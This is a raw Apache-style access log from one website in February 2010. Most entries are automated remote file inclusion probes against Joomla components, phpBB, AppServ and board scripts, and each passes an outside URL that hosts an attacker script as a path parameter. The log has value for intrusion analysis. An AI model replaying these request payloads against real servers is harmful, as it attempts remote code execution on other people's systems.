203.124.149.168 - - [24/Feb/2010:09:00:04 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:12 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:12 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:29 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:00:29 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:00:31 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:00:31 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:00:32 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:01:06 -0800] "GET /logs/access_100205.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:01:16 -0800] "GET /logs/access_100205.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:40 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:40 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:47 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:47 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:02:47 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:03:59 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [24/Feb/2010:09:04:00 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://r00t.hak.su/blue.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:09:04:10 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:09:04:10 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:09:04:10 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:09:05:19 -0800] "GET /logs/access_100209.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:09:05:20 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:05:24 -0800] "GET /logs//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:05:25 -0800] "GET /logs/access_100207.log%20%20//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:05:25 -0800] "GET /index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:05:43 -0800] "GET /logs//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:05:44 -0800] "GET /index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:09:06:01 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:09:06:45 -0800] "GET /logs/access_100201.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:09:06:57 -0800] "GET /logs/access_100216.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:08:13 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:08:26 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:08:33 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:08:34 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:09:44 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:09:47 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:09:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.109.107 - - [24/Feb/2010:09:11:06 -0800] "GET /logs/access_100214.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:09:13:36 -0800] "GET /logs//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:09:13:36 -0800] "GET /components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:09:13:37 -0800] "GET /logs/access_100211.log%20%20//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:09:14:41 -0800] "GET /logs/access_100121.log///appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:09:14:41 -0800] "GET //appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:09:14:41 -0800] "GET /logs///appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:09:14:46 -0800] "GET /logs/access_100120.log///appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:09:16:24 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:09:16:24 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:09:16:24 -0800] "GET /logs/access_100215.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:09:17:05 -0800] "GET /logs/access_100214.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:09:17:07 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:09:17:07 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:09:17:07 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:17:11 -0800] "GET /logs/access_100207.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:18:01 -0800] "GET /logs/access_100207.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:19:32 -0800] "GET /logs/access_100210.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:09:19:51 -0800] "GET /logs/access_100210.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:09:21:38 -0800] "GET /logs//zufallscodepart.php?phpbb_root_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:09:21:38 -0800] "GET /zufallscodepart.php?phpbb_root_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
124.115.6.13 - - [24/Feb/2010:09:23:02 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:17 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:17 -0800] "GET /config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:18 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:21 -0800] "GET /config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:21 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:24:22 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:25:09 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:25:11 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:09:25:22 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:09:25:31 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:09:26:09 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:09:26:28 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:09:27:13 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:09:27:13 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:09:28:11 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:09:28:11 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:09:28:11 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:09:28:59 -0800] "GET /logs/access_100217.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:09:29:19 -0800] "GET /components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:09:29:19 -0800] "GET /logs/access_100119.log%20%20//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:09:29:19 -0800] "GET /logs//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:09:29:39 -0800] "GET /logs/access_100204.log%20%20//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:09:31:46 -0800] "GET /logs/access_100206.log%20%20//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:32:09 -0800] "GET /logs//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:32:09 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:32:09 -0800] "GET /administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:32:11 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:44 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:44 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:33:56 -0800] "GET /administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:33:56 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:33:56 -0800] "GET /logs//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:56 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:56 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:33:57 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:09:33:57 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_multibanners/config_multibanners.php?mosConfig.absolute.path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:34:06 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:09:35:36 -0800] "GET /logs///gnu/bbs///write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:09:35:36 -0800] "GET //gnu/bbs///write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:09:35:36 -0800] "GET /logs/access_100205.log///gnu/bbs///write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:36:35 -0800] "GET /logs/access_100125.log//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:36:38 -0800] "GET /logs/access_100125.log//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:09:36:40 -0800] "GET /logs/index.php?sayfa=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:09:36:40 -0800] "GET /logs/access_100128.log%20%20/index.php?sayfa=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
